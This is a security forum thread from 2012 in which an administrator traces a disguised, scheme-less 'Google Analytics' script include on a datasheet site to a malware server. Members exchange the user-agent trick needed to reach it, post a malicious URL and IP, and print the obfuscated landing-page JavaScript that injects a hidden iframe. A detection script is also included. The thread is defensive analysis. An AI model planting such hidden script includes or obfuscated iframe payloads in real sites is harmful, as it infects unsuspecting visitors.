Author Topic: Nice trick on datasheetz.com  (Read 8303 times)


November 26, 2012, 02:04:14 pm

SysAdMini (Administrator, Hero Member)
A suspicious url was being blocked by web filtering software. Referrer was datasheetz.com.
I looked at the code of datasheetz.com. At a first glance there was nothing suspicious to find.



It took me some time to figure out where the suspicious url came from.
Look at the final script statement at the end of the page code.

Code:
<script src="www.google-analytics.com/urchin.js" type="text/javascript"></script>
looks unsuspicious, because it looks like a normal Google Analytics request. But it's the key.
The url is missing the http:// statement. That means that the url is relative to the current url - actually

hxxp://datasheetz.com/www.google-analytics.com/urchin.js

There you can find the code creating the suspicious url.

I don't get any content from that url. Please let me know if you get something. Url changes occasionally.

Ruining the bad guy's day
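The trick above can be checked for mechanically: a script src with no scheme is resolved against the page URL, so a value shaped like a hostname loads from the current site, not from that host. The following is an added example (not code from the forum post) that scans a page for such look-alike srcs and shows where they really resolve; the sample HTML and the page URL http://datasheetz.com/ are constructed from the thread.

```python
# Added example (not from the forum post): flag <script src> values that look
# like a hostname but carry no scheme, and show where a browser really loads them.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect every src attribute found on a <script> tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)


def looks_like_host_path(src):
    """True for 'host.tld/...' forms: a dotted, hostname-shaped first path
    segment followed by a slash. Plain file names like '45270.js' do not match."""
    head, sep, _rest = src.partition("/")
    labels = head.split(".")
    return (sep == "/" and len(labels) >= 2 and labels[-1].isalpha()
            and all(lbl and lbl.replace("-", "").isalnum() for lbl in labels))


def find_lookalike_script_srcs(page_url, html):
    """Return (src, resolved_url) for scheme-less srcs that masquerade as a host.
    Without 'http://' the browser resolves the src relative to page_url."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        parts = urlsplit(src)
        if parts.scheme or parts.netloc:
            continue  # 'http://host/..' and '//host/..' really go to that host
        if looks_like_host_path(src):
            findings.append((src, urljoin(page_url, src)))
    return findings


# Constructed sample page: a genuine analytics include, a normal local script,
# and the scheme-less look-alike described in the thread.
SAMPLE_HTML = """<html><head>
<script src="http://www.google-analytics.com/urchin.js"></script>
<script src="45270.js"></script></head><body>
<script src="www.google-analytics.com/urchin.js" type="text/javascript"></script>
</body></html>"""

if __name__ == "__main__":
    for src, real in find_lookalike_script_srcs("http://datasheetz.com/", SAMPLE_HTML):
        print(f"{src!r} is really fetched from {real}")
```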

November 27, 2012, 02:31:32 pm
Reply #1

GmG (Special Members, Full Member)
You need to include Java in the user agent string

like

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Java/1.7.0_5


November 27, 2012, 02:49:13 pm
Reply #2

SysAdMini (Administrator, Hero Member)
Thanks! That brings me one step further.

Now I'm stuck at a url like this one:

Code:
http://www3.x9dci2nxllju.pcanywhere.net/?n3n5lc=kqjXmamYrXCVidWlq6Wekt7p2nChZp6YrW%2FFmqBj1Jw%3D
It resolves to 188.116.34.244, but doesn't respond.

November 27, 2012, 07:20:07 pm
Reply #3

GmG (Special Members, Full Member)

November 27, 2012, 09:11:21 pm
Reply #4

SysAdMini (Administrator, Hero Member)
Current url works.

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"   >
<head><meta  content="text/html; charset=utf-8" http-equiv="Content-Type" /><meta http-equiv="Content-Language" content="en"
/>
<meta http-equiv="Cache-control" content="Public"  />  <link  href="http://www.yahoo.com/favicon.ico"></link>

<title>Smart Tools</title>
<script>function ty0mvk0t2Hu(iFoAu){iFoAu=iFoAu.replace(/~/gi,"\\").replace(/``/gi,"\"");var BlSlw="6874";var agFSNM;var guAA=[];function TKvzf(){var bZhQ='gTzU';if('RPpIXv'=='mCaJjp')sHTZo();}
var vFfUot=0;var NkMcK;for(var i=0;i<iFoAu.length;i++){if((iFoAu.length-i)>=parseInt(BlSlw.substring(vFfUot,vFfUot+1))){if('PEFQ'=='evPd')dyTI='aAhu';var pain=parseInt(BlSlw.substring(vFfUot,vFfUot+1));for(var i2=i+pain-1;i2>=i;i2--){guAA.push(iFoAu.substring(i2,i2+1));var bOVG;}
i+=parseInt(BlSlw.substring(vFfUot,vFfUot+1))-1;function HRSBJ(){}}else{var ch_i=i;guAA.push((iFoAu.substring((ch_i+1-1),(ch_i+1))));if('blkArJ'=='ySUudk')cZQgi='sKBaA';}
vFfUot++;if(vFfUot>BlSlw.length-1)vFfUot=0;if('KhCo'=='BHJBuE')jquL='XuKI';}
BRJi=window;BRJi["wW48wk9Gz5ruNyfQ0HT2VV"]=guAA.join('');if('chMi'=='cBvVw')PPLT='cMKEjG';}</script></head><body><div   id="lcAmX"
class="RWjBA&#66;" ></div><div
id="Zrq&#115;z"
qyerD="loQysd" class="UsTu"
></div>
<h2></h2>
<div
Xualiov="RFOwMGp"
id="KvDskKb"  class="ZEQxJH" ></div>
<script src="45270.js"></script>
<script>if('gDWTZ'=='cZLai')hoZTz='bGNpMu';function ZgqLdG(){}
var GchIb=document;var zaHceR;var ODbj="write";function lIaQ(){}
var VbXCqq="\x3c\x69f\x72ame  st\x79\x6c\x65=\"w\x69dt\x68:1px;he\x69ght:1px;po\x73it\x69on:\x61b\x73\x6flute\"  src=\"\x69.html\" \x3e\x3c/\x69fr\x61\x6de\x3e";var iqAKC=252;GchIb.psATl=GchIb[ODbj];if('iBYU'=='moYjY')OnFm='kInw';GchIb.psATl(VbXCqq);var OjkMuE=193;</script>
<div
id="&#102;zC&#113;"
class="mFqbp"  ></div><div  id="&#101;&#120;Row"  class="&#105;FjO" ></div><div  gUlZ="zwCmzF"  id="b&#75;x&#86;&#80;&#67;" class="c&#105;&#111;I"   ></div><div id="Za&#74;O&#120;y" class="&#82;mj&#72;"
></div></body>
<div
lRkysIQ="xhbUUqL"
id="OhtulPT"  class="fKHovrZHK" ></div>
</html>

http://urlquery.net/report.php?id=235488